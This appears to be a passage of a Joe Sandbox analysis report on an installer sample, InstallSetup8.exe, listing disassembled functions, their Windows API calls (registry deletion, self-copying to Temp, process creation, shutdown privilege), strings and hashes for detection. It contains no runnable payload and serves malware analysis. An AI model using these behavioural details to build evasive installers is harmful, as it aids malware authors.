Opcode ID: 5d94e8e5950a8b2ff13ebbfcdf8ec3f64fd71dec5ee91277c9a67e4679359a3d
Instruction ID: f3bec3fd9c2ad120a03a9c06557e7274b723a0da437845685234e4033458a62e
Opcode Fuzzy Hash: 5d94e8e5950a8b2ff13ebbfcdf8ec3f64fd71dec5ee91277c9a67e4679359a3d
Instruction Fuzzy Hash: 0B419471800108BACB11BFA5DD85DBE76B9EF45328B21423FF412B10E2DB3C8A519A2D

Uniqueness

Uniqueness Score: -1.00%

Function 00402EAE Relevance: 7.6, APIs: 5, Instructions: 84registryCOMMON

Download Yara Rule

APIs

RegEnumValueW.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,00000000,?,?,00100020,?,?,?), ref: 00402F02
RegEnumKeyW.ADVAPI32(?,00000000,?,00000105,?,?,00100020,?,?,?), ref: 00402F4E
RegCloseKey.ADVAPI32(?,?,?), ref: 00402F57
RegDeleteKeyW.ADVAPI32(?,?,00000003,?,?), ref: 00402F6E
RegCloseKey.ADVAPI32(?,?,?), ref: 00402F79

Memory Dump Source

Source File: 0000000A.00000002.2030568125.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000A.00000002.2030547915.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000A.00000002.2030588437.0000000000408000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000A.00000002.2030606740.000000000040A000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000A.00000002.2030631576.0000000000445000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_400000_InstallSetup8.jbxd

Similarity

API ID: CloseEnum$DeleteValue
String ID:
API String ID: 1354259210-0
Opcode ID: 2404979ab5d72bd1f47e4c5d2100d154d2dcf156ce7fec90999c2a50aae3b712
Instruction ID: 7c59605d0ca35e0e1f1170af87acd2d95b5481229a772e02f8b12e0d157fbf49
Opcode Fuzzy Hash: 2404979ab5d72bd1f47e4c5d2100d154d2dcf156ce7fec90999c2a50aae3b712
Instruction Fuzzy Hash: 2A216B7150010ABFDF119F90CE89EEF7B7DEB54398F100076B949B21E0D7B49E54AA68

Uniqueness

Uniqueness Score: -1.00%

Function 00401D86 Relevance: 7.6, APIs: 5, Instructions: 75windowCOMMON

Download Yara Rule

APIs

GetDlgItem.USER32(?,?), ref: 00401D9F
GetClientRect.USER32(?,?), ref: 00401DEA
LoadImageW.USER32(?,?,?,?,?,?), ref: 00401E1A
SendMessageW.USER32(?,00000172,?,00000000), ref: 00401E2E
DeleteObject.GDI32(00000000), ref: 00401E3E

Memory Dump Source

Source File: 0000000A.00000002.2030568125.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000A.00000002.2030547915.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000A.00000002.2030588437.0000000000408000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000A.00000002.2030606740.000000000040A000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000A.00000002.2030631576.0000000000445000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_400000_InstallSetup8.jbxd

Similarity

API ID: ClientDeleteImageItemLoadMessageObjectRectSend
String ID:
API String ID: 1849352358-0
Opcode ID: 5a50ccc3029d5fde6ea81844b1e337cdf63f6177f9f2d7308e11f2af529302b6
Instruction ID: ff9804e90d7d2423da96771145ec8c84d1acc30631874d8c14b803c0354ed8c3
Opcode Fuzzy Hash: 5a50ccc3029d5fde6ea81844b1e337cdf63f6177f9f2d7308e11f2af529302b6
Instruction Fuzzy Hash: 73210772900119AFCB05DF98EE45AEEBBB5EF08314F14003AF945F62A0D7789D81DB98

Uniqueness

Uniqueness Score: -1.00%

Function 00401E53 Relevance: 7.5, APIs: 5, Instructions: 43COMMON

Download Yara Rule

APIs

GetDC.USER32(?), ref: 00401E56
GetDeviceCaps.GDI32(00000000,0000005A,00000048), ref: 00401E70
MulDiv.KERNEL32(00000000,00000000), ref: 00401E78
ReleaseDC.USER32(?,00000000), ref: 00401E89
CreateFontIndirectW.GDI32(0040CDF0,0040CE0C,?), ref: 00401ED8

Memory Dump Source

Source File: 0000000A.00000002.2030568125.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000A.00000002.2030547915.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000A.00000002.2030588437.0000000000408000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000A.00000002.2030606740.000000000040A000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000A.00000002.2030631576.0000000000445000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_400000_InstallSetup8.jbxd

Similarity

API ID: CapsCreateDeviceFontIndirectRelease
String ID:
API String ID: 3808545654-0
Opcode ID: ecb0f290f5c1122776e84f7afc2181d255ab8ed52f1adad26d3dddab1dbe2d45
Instruction ID: a825ad976d3f878f3d1ae6f085165680ecf176d60430839047bda31eedf7821d
Opcode Fuzzy Hash: ecb0f290f5c1122776e84f7afc2181d255ab8ed52f1adad26d3dddab1dbe2d45
Instruction Fuzzy Hash: 62017571905240EFE7005BB4EE49BDD3FA4AB15301F10867AF541B61E2C7B904458BED

Uniqueness

Uniqueness Score: -1.00%

Function 00401C48 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 84windowtimeCOMMON

Download Yara Rule

APIs

SendMessageTimeoutW.USER32(00000000,00000000,?,?,?,00000002,?), ref: 00401CB8
SendMessageW.USER32(00000000,00000000,?,?), ref: 00401CD0

Strings

!, xrefs: 00401C84

Memory Dump Source

Source File: 0000000A.00000002.2030568125.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000A.00000002.2030547915.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000A.00000002.2030588437.0000000000408000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000A.00000002.2030606740.000000000040A000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000A.00000002.2030631576.0000000000445000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_400000_InstallSetup8.jbxd

Similarity

API ID: MessageSend$Timeout
String ID: !
API String ID: 1777923405-2657877971
Opcode ID: 069d8cd0b50c9c3d23d30c496d0653b5436aef65d2998253063e1abfe41eec6a
Instruction ID: 3d1946e732457e70d46414fe723373bc78a31951f468440fe5e33f287296c6aa
Opcode Fuzzy Hash: 069d8cd0b50c9c3d23d30c496d0653b5436aef65d2998253063e1abfe41eec6a
Instruction Fuzzy Hash: BC21AD71D1421AAFEB05AFA4D94AAFE7BB0EF84304F10453EF601B61D0D7B84941DB98

Uniqueness

Uniqueness Score: -1.00%

Function 00404D83 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 84stringCOMMON

Download Yara Rule

APIs

lstrlenW.KERNEL32(0042CA68,0042CA68,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,?,000000DF,00000000,00000400,?), ref: 00404E24
wsprintfW.USER32(00000000,0042CA68,0042CA68,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,?,000000DF,00000000,00000400,?), ref: 00404E2D
SetDlgItemTextW.USER32(?,0042CA68), ref: 00404E40

Strings

%u.%u%s%s, xrefs: 00404E0E

Memory Dump Source

Source File: 0000000A.00000002.2030568125.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000A.00000002.2030547915.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000A.00000002.2030588437.0000000000408000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000A.00000002.2030606740.000000000040A000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000A.00000002.2030631576.0000000000445000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_400000_InstallSetup8.jbxd

Similarity

API ID: ItemTextlstrlenwsprintf
String ID: %u.%u%s%s
API String ID: 3540041739-3551169577
Opcode ID: 2c674a3dc48973326ebd454f1002488dce618ddc5f98b18a2ee0300ee1e706a4
Instruction ID: 0fe25742dfe6cfa92c38baccc724587d3b65f537d6828788df476db8ac6fa50e
Opcode Fuzzy Hash: 2c674a3dc48973326ebd454f1002488dce618ddc5f98b18a2ee0300ee1e706a4
Instruction Fuzzy Hash: B111EB336042283BDB109A6DAC45E9E329CDF85374F250237FA65F71D1E978DC2282E8

Uniqueness

Uniqueness Score: -1.00%

Function 0040301E Relevance: 6.0, APIs: 4, Instructions: 33COMMON

Download Yara Rule

APIs

DestroyWindow.USER32(?,00000000,004031FC,00000001), ref: 00403031
GetTickCount.KERNEL32(00000000,004031FC,00000001), ref: 0040304F
CreateDialogParamW.USER32(0000006F,00000000,00402F98,00000000), ref: 0040306C
ShowWindow.USER32(00000000,00000005), ref: 0040307A

Memory Dump Source

Source File: 0000000A.00000002.2030568125.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000A.00000002.2030547915.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000A.00000002.2030588437.0000000000408000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000A.00000002.2030606740.000000000040A000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000A.00000002.2030631576.0000000000445000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_400000_InstallSetup8.jbxd

Similarity

API ID: Window$CountCreateDestroyDialogParamShowTick
String ID:
API String ID: 2102729457-0
Opcode ID: 3e0f77edca3fe8d4731edd858be8c75d6ac57a75eac47466490e255ad15c8a0f
Instruction ID: 9291db8f65f8f9a8906298ccab22143765a9ea5c3e1cf5a275661437a5304794
Opcode Fuzzy Hash: 3e0f77edca3fe8d4731edd858be8c75d6ac57a75eac47466490e255ad15c8a0f
Instruction Fuzzy Hash: 22F08970602A21AFC6306F50FE09A9B7F68FB45B52B51053AF445B11ACCB345C91CB9D

Uniqueness

Uniqueness Score: -1.00%

Function 00405550 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 46windowCOMMON

Download Yara Rule

APIs

IsWindowVisible.USER32(?), ref: 0040557F
CallWindowProcW.USER32(?,?,?,?), ref: 004055D0

Part of subcall function 00404522: SendMessageW.USER32(?,00000000,00000000,00000000,004056D2,00000000), ref: 00404534

Strings

, xrefs: 00405560

Memory Dump Source

Source File: 0000000A.00000002.2030568125.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000A.00000002.2030547915.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000A.00000002.2030588437.0000000000408000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000A.00000002.2030606740.000000000040A000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000A.00000002.2030631576.0000000000445000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_400000_InstallSetup8.jbxd

Similarity

API ID: Window$CallMessageProcSendVisible
String ID:
API String ID: 3748168415-3916222277
Opcode ID: 831ed5cf29225e66f7bf56ab76169cd98d2ca93c2364028159cf8fc7ca140134
Instruction ID: 994decb8795c597c60d879b60f38f30bda4d2919c1ffc13ce94f3a2918c86729
Opcode Fuzzy Hash: 831ed5cf29225e66f7bf56ab76169cd98d2ca93c2364028159cf8fc7ca140134
Instruction Fuzzy Hash: 1C01717120060CBFEF219F11DD84A9B3B67EB84794F144037FA41761D5C7398D529A6D

Uniqueness

Uniqueness Score: -1.00%

Function 00406076 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 37COMMON

Download Yara Rule

APIs

GetTickCount.KERNEL32(00009292,00441800,?,?,00000000,00403530,00441000,00441800,00441800,00441800,00441800,00441800,00441800,0040381C,?,00000008), ref: 00406094
GetTempFileNameW.KERNEL32(?,?,00000000,?,?,?,00000000,00403530,00441000,00441800,00441800,00441800,00441800,00441800,00441800,0040381C), ref: 004060AF

Strings

nsa, xrefs: 00406083

Memory Dump Source

Source File: 0000000A.00000002.2030568125.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000A.00000002.2030547915.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000A.00000002.2030588437.0000000000408000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000A.00000002.2030606740.000000000040A000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000A.00000002.2030631576.0000000000445000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_400000_InstallSetup8.jbxd

Similarity

API ID: CountFileNameTempTick
String ID: nsa
API String ID: 1716503409-2209301699
Opcode ID: 017de5c5da22b1c6cf72d7a8a287ef2c48f88e3ac937424cf3c6df762bd8e462
Instruction ID: 86e06e500a6970b3bc5bd370241205c1b86a0a172d82c816bfbfc8c597d973d5
Opcode Fuzzy Hash: 017de5c5da22b1c6cf72d7a8a287ef2c48f88e3ac937424cf3c6df762bd8e462
Instruction Fuzzy Hash: 65F09076B50204FBEB10CF69ED05F9EB7ACEB95750F11803AED05F7240E6B099548768

Uniqueness

Uniqueness Score: -1.00%

Function 00405FAC Relevance: 5.0, APIs: 4, Instructions: 37stringCOMMON

Download Yara Rule

APIs

lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00406291,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405FBC
lstrcmpiA.KERNEL32(00000000,00000000,?,00000000,00406291,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405FD4
CharNextA.USER32(00000000,?,00000000,00406291,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405FE5
lstrlenA.KERNEL32(00000000,?,00000000,00406291,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405FEE

Memory Dump Source

Source File: 0000000A.00000002.2030568125.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000A.00000002.2030547915.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000A.00000002.2030588437.0000000000408000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000A.00000002.2030606740.000000000040A000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000A.00000002.2030631576.0000000000445000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_400000_InstallSetup8.jbxd

Similarity

API ID: lstrlen$CharNextlstrcmpi
String ID:
API String ID: 190613189-0
Opcode ID: 2e04212541fd7d2d0fc4f715182178ccf0de62a07a1c27cf83518a5c6c9cf375
Instruction ID: e9567a821587a5f0376c4e2be66d4cfc8c6f540c5076303c4651ac02cb4e93c6
Opcode Fuzzy Hash: 2e04212541fd7d2d0fc4f715182178ccf0de62a07a1c27cf83518a5c6c9cf375
Instruction Fuzzy Hash: E1F09631105519FFC7029FA5DE00D9FBBA8EF05350B2540B9F840F7250D678DE01AB69

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: InstallSetup8.exePID: 352, Parent PID: 4420COMMON

Executed Functions

Function 00403532 Relevance: 81.0, APIs: 32, Strings: 14, Instructions: 464
stringfilecomCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

SetErrorMode.KERNEL32 ref: 00403555
GetVersionExW.KERNEL32(?,?,?,?,?,?,?,?), ref: 00403580
GetVersionExW.KERNEL32(?,?,?,?,?,?,?,?,?), ref: 00403593
lstrlenA.KERNEL32(UXTHEME,UXTHEME,?,?,?,?,?,?,?,?), ref: 0040362C
#17.COMCTL32(?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 00403669
OleInitialize.OLE32(00000000), ref: 00403670
SHGetFileInfoW.SHELL32(0042AA28,00000000,?,000002B4,00000000), ref: 0040368F
GetCommandLineW.KERNEL32(00433700,NSIS Error,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 004036A4
CharNextW.USER32(00000000,0043F000,00000020,0043F000,00000000,?,00000008,0000000A,0000000C), ref: 004036DD
GetTempPathW.KERNEL32(00000400,C:\Users\user\AppData\Local\Temp\,00000000,00008001,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 00403815
GetWindowsDirectoryW.KERNEL32(C:\Users\user\AppData\Local\Temp\,000003FB,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 00403826
lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,\Temp), ref: 00403832
GetTempPathW.KERNEL32(000003FC,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,\Temp,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 00403846
lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,Low), ref: 0040384E
SetEnvironmentVariableW.KERNEL32(TEMP,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,Low,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 0040385F
SetEnvironmentVariableW.KERNEL32(TMP,C:\Users\user\AppData\Local\Temp\,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 00403867
DeleteFileW.KERNEL32(1033,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 0040387B
lstrlenW.KERNEL32(C:\Users\user\AppData\Local\Temp\,0043F000,00000000,?,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 00403954

Part of subcall function 00406557: lstrcpynW.KERNEL32(?,?,00000400,004036A4,00433700,NSIS Error,?,00000008,0000000A,0000000C), ref: 00406564

wsprintfW.USER32 ref: 004039B1
GetFileAttributesW.KERNEL32(00437800,C:\Users\user\AppData\Local\Temp\), ref: 004039E4
DeleteFileW.KERNEL32(00437800), ref: 004039F0
SetCurrentDirectoryW.KERNEL32(C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\), ref: 00403A1E

Part of subcall function 00406317: MoveFileExW.KERNEL32(?,?,00000005,00405E15,?,00000000,000000F1,?,?,?,?,?), ref: 00406321

CopyFileW.KERNEL32(C:\Users\user\AppData\Local\Temp\InstallSetup8.exe,00437800,00000001,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00403A34

Part of subcall function 00405B3A: CreateProcessW.KERNEL32(00000000,00437800,00000000,00000000,00000000,04000000,00000000,00000000,0042FA70,?,?,?,00437800,?), ref: 00405B63
Part of subcall function 00405B3A: CloseHandle.KERNEL32(?,?,?,00437800,?), ref: 00405B70

Part of subcall function 004068B4: FindFirstFileW.KERNEL32(74DF3420,0042FAB8,C:\Users\user\AppData\Local\Temp\nsu43BF.tmp,00405F77,C:\Users\user\AppData\Local\Temp\nsu43BF.tmp,C:\Users\user\AppData\Local\Temp\nsu43BF.tmp,00000000,C:\Users\user\AppData\Local\Temp\nsu43BF.tmp,C:\Users\user\AppData\Local\Temp\nsu43BF.tmp,74DF3420,?,C:\Users\user\AppData\Local\Temp\,00405C83,?,74DF3420,C:\Users\user\AppData\Local\Temp\), ref: 004068BF
Part of subcall function 004068B4: FindClose.KERNEL32(00000000), ref: 004068CB

OleUninitialize.OLE32(?,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 00403A82
ExitProcess.KERNEL32 ref: 00403A9F
CloseHandle.KERNEL32(00000000,00438000,00438000,?,00437800,00000000), ref: 00403AA6
GetCurrentProcess.KERNEL32(00000028,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 00403AC2
OpenProcessToken.ADVAPI32(00000000,?,?,?,?,?,?,?,?), ref: 00403AC9
LookupPrivilegeValueW.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 00403ADE
AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,?,?,?,?,?,?,?), ref: 00403B01
ExitWindowsEx.USER32(00000002,80040002), ref: 00403B26
ExitProcess.KERNEL32 ref: 00403B49

Part of subcall function 00405B05: CreateDirectoryW.KERNEL32(?,00000000,00403525,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,0040381C,?,00000008,0000000A,0000000C), ref: 00405B0B

Strings

TEMP, xrefs: 0040385A
C:\Users\user\AppData\Local\Temp\InstallSetup8.exe, xrefs: 00403A2F
Error launching installer, xrefs: 004038FD
C:\Users\user\AppData\Local\Temp, xrefs: 00403972
TMP, xrefs: 00403862
UXTHEME, xrefs: 00403620, 00403625, 0040362B
Low, xrefs: 00403848
NSIS Error, xrefs: 00403695
C:\Users\user\AppData\Local\Temp\, xrefs: 0040380A, 0040380F, 00403825, 00403831, 00403840, 0040384D, 00403859, 00403861, 0040394F, 004039D0, 004039FC, 00403A1D, 00403A26
~nsu%X.tmp, xrefs: 004039A8
1033, xrefs: 00403876
SeShutdownPrivilege, xrefs: 00403AD8
C:\Users\user\AppData\Local\Temp, xrefs: 00403927
\Temp, xrefs: 0040382C

Memory Dump Source

Source File: 0000000D.00000002.3179518855.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000D.00000002.3179251452.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000D.00000002.3179889284.0000000000408000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000D.00000002.3180147874.000000000040A000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000D.00000002.3180147874.000000000042F000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000D.00000002.3180147874.0000000000431000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000D.00000002.3180147874.000000000043A000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000D.00000002.3180147874.0000000000440000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000D.00000002.3182111858.0000000000445000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_400000_InstallSetup8.jbxd

Similarity

API ID: File$Process$CloseDirectoryExit$CreateCurrentDeleteEnvironmentFindHandlePathTempTokenVariableVersionWindowslstrcatlstrlen$AdjustAttributesCharCommandCopyErrorFirstInfoInitializeLineLookupModeMoveNextOpenPrivilegePrivilegesUninitializeValuelstrcpynwsprintf
String ID: 1033$C:\Users\user\AppData\Local\Temp$C:\Users\user\AppData\Local\Temp$C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Local\Temp\InstallSetup8.exe$Error launching installer$Low$NSIS Error$SeShutdownPrivilege$TEMP$TMP$UXTHEME$\Temp$~nsu%X.tmp
API String ID: 1813718867-2275619491
Opcode ID: e969c2e22f73361fc79175c4bfa344e76f400cd5c8ceb61292dbf8b91988ccbf
Instruction ID: 6c1349364f4d22fadfcc29bbd5f82b0434b4f5ba6e08f6571c64e8404a3f48da
Opcode Fuzzy Hash: e969c2e22f73361fc79175c4bfa344e76f400cd5c8ceb61292dbf8b91988ccbf
Instruction Fuzzy Hash: 64F10270604301ABD320AF659D45B2B7AE8EF8570AF10483EF581B22D1DB7DDA45CB6E

Uniqueness

Uniqueness Score: -1.00%

Function 00405C63 Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 148
filestringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

DeleteFileW.KERNEL32(?,?,74DF3420,C:\Users\user\AppData\Local\Temp\,0043F000), ref: 00405C8C
lstrcatW.KERNEL32(0042EA70,\*.*), ref: 00405CD4
lstrcatW.KERNEL32(?,0040A014), ref: 00405CF7
lstrlenW.KERNEL32(?,?,0040A014,?,0042EA70,?,?,74DF3420,C:\Users\user\AppData\Local\Temp\,0043F000), ref: 00405CFD
FindFirstFileW.KERNEL32(0042EA70,?,?,?,0040A014,?,0042EA70,?,?,74DF3420,C:\Users\user\AppData\Local\Temp\,0043F000), ref: 00405D0D
FindNextFileW.KERNELBASE(00000000,00000010,000000F2,?,?,?,?,0000002E), ref: 00405DAD
FindClose.KERNEL32(00000000), ref: 00405DBC

Strings

C:\Users\user\AppData\Local\Temp\, xrefs: 00405C70
\*.*, xrefs: 00405CCE
pB, xrefs: 00405CBC

Memory Dump Source

Source File: 0000000D.00000002.3179518855.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000D.00000002.3179251452.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000D.00000002.3179889284.0000000000408000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000D.00000002.3180147874.000000000040A000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000D.00000002.3180147874.000000000042F000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000D.00000002.3180147874.0000000000431000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000D.00000002.3180147874.000000000043A000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000D.00000002.3180147874.0000000000440000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000D.00000002.3182111858.0000000000445000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_400000_InstallSetup8.jbxd

Similarity

API ID: FileFind$lstrcat$CloseDeleteFirstNextlstrlen
String ID: C:\Users\user\AppData\Local\Temp\$\*.*$pB
API String ID: 2035342205-1023570929
Opcode ID: bc80552e2adf98b6cbbc0c73f9d9449be503fe2b945a8ee0ce3316eb6b08af02
Instruction ID: 3df5019795aaf58f6817f8e3609a5bcb0d9fa216103f8ca083ea3247371bac5c
Opcode Fuzzy Hash: bc80552e2adf98b6cbbc0c73f9d9449be503fe2b945a8ee0ce3316eb6b08af02
Instruction Fuzzy Hash: 2441B231400A14BADB21BB65DC8DAAF7678EF81714F24813BF801B11D1DB7C4A81DEAE

Uniqueness

Uniqueness Score: -1.00%

Function 004068B4 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 14
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

FindFirstFileW.KERNEL32(74DF3420,0042FAB8,C:\Users\user\AppData\Local\Temp\nsu43BF.tmp,00405F77,C:\Users\user\AppData\Local\Temp\nsu43BF.tmp,C:\Users\user\AppData\Local\Temp\nsu43BF.tmp,00000000,C:\Users\user\AppData\Local\Temp\nsu43BF.tmp,C:\Users\user\AppData\Local\Temp\nsu43BF.tmp,74DF3420,?,C:\Users\user\AppData\Local\Temp\,00405C83,?,74DF3420,C:\Users\user\AppData\Local\Temp\), ref: 004068BF
FindClose.KERNEL32(00000000), ref: 004068CB

Strings

C:\Users\user\AppData\Local\Temp\nsu43BF.tmp, xrefs: 004068B4

Memory Dump Source

Source File: 0000000D.00000002.3179518855.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000D.00000002.3179251452.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000D.00000002.3179889284.0000000000408000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000D.00000002.3180147874.000000000040A000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000D.00000002.3180147874.000000000042F000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000D.00000002.3180147874.0000000000431000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000D.00000002.3180147874.000000000043A000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000D.00000002.3180147874.0000000000440000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000D.00000002.3182111858.0000000000445000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_400000_InstallSetup8.jbxd

Similarity

API ID: Find$CloseFileFirst
String ID: C:\Users\user\AppData\Local\Temp\nsu43BF.tmp
API String ID: 2295610775-4014855586
Opcode ID: d8a05a579feb8caf00dd3d3e1258ef949bc643ef28fd0ab534c34ddbe61a4aed
Instruction ID: 0f602bcf77736d61886636fd33b874369bd8b56ce32760b4adaf045605f9a717
Opcode Fuzzy Hash: d8a05a579feb8caf00dd3d3e1258ef949bc643ef28fd0ab534c34ddbe61a4aed
Instruction Fuzzy Hash: 24D012725161309BC2406738AD0C84B7B58AF15331751CA37F56BF21E0D7348C6387A9

Uniqueness

Uniqueness Score: -1.00%

Function 00403C29 Relevance: 42.2, APIs: 14, Strings: 10, Instructions: 215
stringregistryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 0040694B: GetModuleHandleA.KERNEL32(?,00000020,?,00403642,0000000C,?,?,?,?,?,?,?,?), ref: 0040695D
Part of subcall function 0040694B: GetProcAddress.KERNEL32(00000000,?), ref: 00406978

GetUserDefaultUILanguage.KERNEL32(00000002,74DF3420,C:\Users\user\AppData\Local\Temp\,00000000,0043F000,00008001), ref: 00403C43

